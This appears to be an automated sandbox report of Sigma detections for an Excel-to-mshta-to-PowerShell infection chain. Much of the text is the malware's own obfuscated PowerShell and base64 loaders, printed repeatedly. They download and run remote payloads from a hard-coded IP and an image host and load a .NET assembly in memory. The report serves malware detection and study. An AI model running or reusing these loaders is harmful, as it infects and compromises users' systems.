'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAn

Sigma detected: File With Uncommon Extension Created By An Office Application

Source: File created

Author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3588, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood[1].hta

Sigma detected: Potentially Suspicious PowerShell Child Processes

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4004, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , ProcessId: 3380, ProcessName: wscript.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgI

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3588, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3880, ProcessName: mshta.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4004, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , ProcessId: 3380, ProcessName: wscript.exe

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4004, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline", ProcessId: 3144, ProcessName: csc.exe

Sigma detected: Excel Network Connections

Source: Network Connection

Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 104.21.34.183, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3588, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4004, TargetFilename: C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3588, Protocol: tcp, SourceIp: 104.21.34.183, SourceIsIpv6: false, SourcePort: 443

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4004, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , ProcessId: 3380, ProcessName: wscript.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4004, TargetFilename: C:\Users\user\AppData\Local\Temp\vlwyfswc\vlwyfswc.cmdline

Sigma detected: Modification of IE Registry Settings

Source: Registry Key set

Author: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3588, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))", CommandLine: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; 